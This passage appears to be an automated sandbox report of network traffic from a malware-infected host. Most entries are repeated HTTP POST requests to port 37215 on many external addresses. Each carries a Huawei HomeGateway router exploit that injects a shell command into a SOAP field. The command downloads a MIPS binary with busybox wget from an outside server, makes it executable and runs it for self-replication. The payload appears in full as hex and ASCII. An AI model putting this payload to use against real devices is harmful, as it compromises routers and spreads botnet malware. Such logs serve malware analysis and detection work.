                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1205192.168.2.1335294157.212.64.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446955919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1206192.168.2.135562841.45.200.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446962118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1207192.168.2.1359744197.112.97.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446983099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1208192.168.2.134094841.54.162.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446995974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1209192.168.2.134940441.142.22.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447160006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1210192.168.2.134038441.54.5.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447184086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1211192.168.2.1343276157.228.135.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447185040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1212192.168.2.1359560143.81.133.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447212934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1213192.168.2.1345598197.213.31.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447212934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1214192.168.2.133617841.121.111.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.447232962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
